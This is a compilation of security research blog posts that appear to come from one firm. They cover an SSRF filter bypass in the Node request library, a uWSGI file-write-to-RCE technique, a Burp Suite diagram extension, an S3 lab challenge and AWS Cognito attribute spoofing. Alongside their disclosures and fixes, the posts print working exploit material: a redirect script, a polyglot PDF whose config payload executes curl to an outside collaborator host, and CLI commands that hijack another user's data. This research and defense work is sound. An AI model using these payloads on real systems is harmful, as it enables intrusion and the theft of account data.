Server Side Request Forgery (SSRF) is a fairly known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I have bypassed a filter that we have recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.
Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.
SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.
None of above is new, of course. All of these techniques have been around for years and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.
Client’s code was a simple endpoint created for integration. During the original engagement there was no filtering at all. After our test the client has applied an anti-SSRF library ssrfFilter. For the research and code anonymity purposes, I have extracted the logic to a standalone NodeJS script:
const request = require('request');
const ssrfFilter = require('ssrf-req-filter');
let url = process.argv[2];
console.log("Testing", url);
request({
uri: url,
agent: ssrfFilter(url),
}, function (error, response, body) {
console.error('error:', error);
console.log('statusCode:', response && response.statusCode);
});
To verify a redirect bypasss I have created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun
:
<?php header('Location: '.$_GET["target"]); ?>
Initial test demonstrates that the vulnerability is fixed:
$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test"
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.
But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:
$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200
What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.
Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js
file:
// handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
delete request.agent
}
According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent
cannot be used with both protocols.
Unfortunately, such behavior also loses any event handling associated with the agent. Given, that the SSRF prevention is based on the agents’ createConnection
event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request
library.
This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-days mark, we have decided to publish the full technical details as well as a public Github issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID has been assigned to this vulnerability.
Since supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.
The node-Fetch
library also allows to overwrite an HTTP(S) agent within its options, without specifying the protocol:
const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));
let url = process.argv[2];
console.log("Testing", url);
fetch(url, {
agent: ssrfFilter(url)
}).then((response) => {
console.log('Success');
}).catch(error => {
console.log('${error.toString().split('\n')[0]}');
});
Contrary to the request
library though, it simply fails in the case of a cross-protocol redirect:
$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"
It is therefore impossible to perform a similar attack on this library.
The axios
library’s options allow to overwrite agents for both protocols separately. Therefore the following code is protected:
axios.get(url, {
httpAgent: ssrfFilter("http://domain"),
httpsAgent: ssrfFilter("https://domain")
})
Note: In Axios library, it is neccesary to hardcode the urls during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for a wrong protocol and the cross-protocol redirect would fail similarly to the node-fetch
library.
Still, axios
calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:
axios.get(url, {
// httpAgent: ssrfFilter(url),
httpsAgent: ssrfFilter(url)
})
Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:
rules:
- id: axios-only-one-agent-set
message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
mode: taint
pattern-sources:
- patterns:
- pattern-either:
- pattern: |
{..., httpsAgent:..., ...}
- pattern: |
{..., httpAgent:..., ...}
- pattern-not: |
{...,httpAgent:...,httpsAgent:...}
pattern-sinks:
- pattern: $AXIOS.request(...)
- pattern: $AXIOS.get(...)
- pattern: $AXIOS.delete(...)
- pattern: $AXIOS.head(...)
- pattern: $AXIOS.options(...)
- pattern: $AXIOS.post(...)
- pattern: $AXIOS.put(...)
- pattern: $AXIOS.patch(...)
languages:
- javascript
- typescript
severity: WARNING
As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.
We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios
could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.
Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:
A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):
.htaccess
, .config
, web.config
, httpd.conf
, __init__.py
and .xml
).php
, .asp
, .jsp
files)venv
).bashrc
, .bash-profile
and .profile
authorized_keys
and authorized_keys2
- to gain SSH accessIt’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.
The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.
In our scenario, the application had a vulnerable endpoint, through which, an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:
The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:
drwxrwxr-x 6 root root 4096 Nov 18 13:48 .
-rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini
The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini
). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128 . The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]
”):
while (len) {
ini_line = ini_get_line(ini, len);
if (ini_line == NULL) {
break;
}
lines++;
// skip empty line
key = ini_lstrip(ini);
ini_rstrip(key);
if (key[0] != 0) {
if (key[0] == '[') {
section = key + 1;
section[strlen(section) - 1] = 0;
}
else if (key[0] == ';' || key[0] == '#') {
// this is a comment
}
else {
// val is always valid, but (obviously) can be ignored
val = ini_get_key(key);
if (!strcmp(section, section_asked)) {
got_section = 1;
ini_rstrip(key);
val = ini_lstrip(val);
ini_rstrip(val);
add_exported_option((char *) key, val, 0);
}
}
}
len -= (ini_line - ini);
ini += (ini_line - ini);
}
More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@
’ operator in particular is used in the form of @(filename)
to include the contents of a file. Many uWSGI schemes are supported, including “exec
” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini
configuration file is parsed:
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://0)
; read from http
test = @(http://doyensec.com/hello)
; read from a file descriptor
content = @(fd://3)
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
While abusing the above .ini
files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:
[uwsgi]
home = /app
uid = webapp
gid = webapp
chdir = /app/console
socket = 127.0.0.1:8001
wsgi-file = /app/console/uwsgi-sockets.py
gevent = 500
logto = /var/log/uwsgi/%n.log
harakiri = 30
vacuum = True
py-auto-reload = 3
callable = app
pidfile = /var/run/uwsgi-sockets-console.pid
log-maxsize = 100000000
log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak
In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py
file with any data will trigger the uWSGI configuration file to be reloaded.
In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini
configuration file. The .ini
payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini
payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:
from fpdf import FPDF
from exiftool import ExifToolHelper
with ExifToolHelper() as et:
et.set_tags(
["doyensec.jpg"],
tags={"model": "
[uwsgi]
foo = @(exec://curl http://collaborator-unique-host.oastify.com)
"},
params=["-E", "-overwrite_original"]
)
class MyFPDF(FPDF):
pass
pdf = MyFPDF()
pdf.add_page()
pdf.image('./doyensec.jpg')
pdf.output('payload.pdf', 'F')
This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl
payload. The payload can be tested locally with the following command:
uwsgi --ini payload.pdf
Let’s exploit it on the web server with the following steps:
payload.pdf
into /app/console/uwsgi-sockets.ini
.py
curl
on Burp collaboratorAs highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.
We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on Github.
Modern web platforms design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.
In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.
We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).
Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.
A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.
While classic sequence diagrams for software engineering are meant for an abstract visualization and all the information is carried by the diagram itself. PESD is designed to include granular information related to the underlying HTTP traffic being represented in the form of metadata.
The Enriched
part in the format name originates from the diagram-metadata linkability
. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.
As an example, URL query parameters will be found in the arrow events as UrlParams
expandable with a click.
Some key characteristics of the format :
The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.
Once loaded, sending items to the extension will directly result in a export with all the active settings.
Currently, two modes of operation are supported:
multi-domain
flows analysis
single-domain
flows analysis
Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover
Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N>
/ <VAR_N>
. The re-renderization will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name
Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br>
in Burp Suite comments to obtain multi-line notes in PESD exports
Save as :
SVG
formatMarkdown
file (MermaidJS syntax),metadata
in JSON
format. Read about the metadata structure in the format definition page, “exports section”PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:
OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame
SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame
Template matching example for SAML SP-initiated SSO with redirect POST:
The template engine is also ensuring consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS renderization.
Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.
Do you want to contribute by writing you own templates? Follow the template implementation guide.
PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of its underlying logic. The role of each actor can be easily derived and used to build a test plan before diving in Burp Suite.
It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.
In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.
The following detailed examples are extracted from our testing activities:
The major benefit from the research output was the conjunction of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows to describe the issue in a straightforward way.
The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:
Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;
White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.
In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.
The following basic example is extracted from one of our client engagements.
An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.
In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.
The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:
The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.
The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing : tenantId
, user_id
, and others. The returned output contained the authentication details for the requested impersonation session: access_token
, refresh_token
and user_id
. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.
In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.
Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).
As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web facing platform. By doing so, the need of a valid super-admin access to the internal application (authentication) and a specific target-user access grant (authorization) were bypassed.
Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.
Feel free to contribute with pull requests, bug reports or enhancements.
This project was made with love in the Doyensec Research island by Francesco Lacerenza . The extension was developed during his internship with 50% research time.
The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.
The name of the bucket is returned to the client by calling the /variable
endpoint:
$.ajax({
type: 'GET',
url: '/variable',
dataType: 'json',
success: function (data) {
let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
$(".logo_image").attr("src", source_internal);
},
error: function (jqXHR, status, err) {
alert("Error getting variable name");
}
});
The server will return something like:
"data-internal-private-20220705153355922300000001"
So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private
S3 bucket:
Then, by visiting the Data Gallery section, you will see the keys.txt
and dummy.txt
objects, which are stored within the internal bucket.
Amazon Web Services offer a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.
From AWS Cognito’s welcome page:
“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”
Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.
The two main components of Amazon Cognito are:
With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.
Each user has a profile that applications can access through the software development kit (SDK).
User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.
An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.
In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.
A user can be authenticated in different ways using Cognito, but the main options are:
AdminInitiateAuth
API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth
and cognito-idp:AdminRespondToAuthChallenge
. The operation returns the required authentication parameters.In both the cases, the end-user should receive the resulting JSON Web Token.
After that first look at AWS SDK credentials, we can jump straight to the tidbit case.
For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.
The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.
In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.
{
"sub": "cf9..[REDACTED]",
"device_key": "us-east-1_ab..[REDACTED]",
"iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
"client_id": "9..[REDACTED]",
"origin_jti": "ab..[REDACTED]",
"event_id": "d..[REDACTED]",
"token_use": "access",
"scope": "aws.cognito.signin.user.admin",
"auth_time": [REDACTED],
"exp": [REDACTED],
"iat": [REDACTED],
"jti": "3b..[REDACTED]",
"username": "[REDACTED]"
}
In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.
The permitted API definitions can be found here.
If the request syntax for the API call includes the parameter "AccessToken": "string"
, then it allows users to modify something on their own UserPool entry with the previously inspected JWT.
The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.
The user associated data within the pool was fetched by using the AWS CLI:
$ aws cognito-idp get-user --region us-east-1--access-token eyJra..[REDACTED SESSION JWT]
{
"Username": "[REDACTED]",
"UserAttributes": [
{
"Name": "sub",
"Value": "cf915…[REDACTED]"
},
{
"Name": "email_verified",
"Value": "true"
},
{
"Name": "name",
"Value": "[REDACTED]"
},
{
"Name": "custom:X_platform_user_id",
"Value": "[REDACTED ID]"
},
{
"Name": "email",
"Value": "[REDACTED]"
}
]
}
After finding the X_platform_user_id
user pool attribute, it was clear
that it was there for a specific purpose. In fact, the platform was
fetching the attribute to use it as the primary key to query the
associated refresh_token
in an internal database.
Attempting to spoof the attribute was as simple as executing:
$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]
The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token
needed to fetch and show data from X_platform in the UI.
In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.
The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.
Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.
In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.
While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:
Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).
By removing it, users will not be able to perform attribute updates using their access tokens.
Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.
+1 remediation tip: To avoid doing it by hand, apply the r/w
config in your IaC and have the infrastructure correctly deployed. Terraform example:
resource "aws_cognito_user_pool" "my_pool" {
name = "my_pool"
}
...
resource "aws_cognito_user_pool" "pool" {
name = "pool"
}
resource "aws_cognito_user_pool_client" "client" {
name = "client"
user_pool_id = aws_cognito_user_pool.pool.id
read_attributes = ["email"]
write_attributes = ["email"]
}
The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes
or write_attributes
lists, the default r/w policy will be ignored.
By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.
Please ensure to properly handle the email and phone number verification in Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate
parameter.
As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/
Stay tuned for the next episode!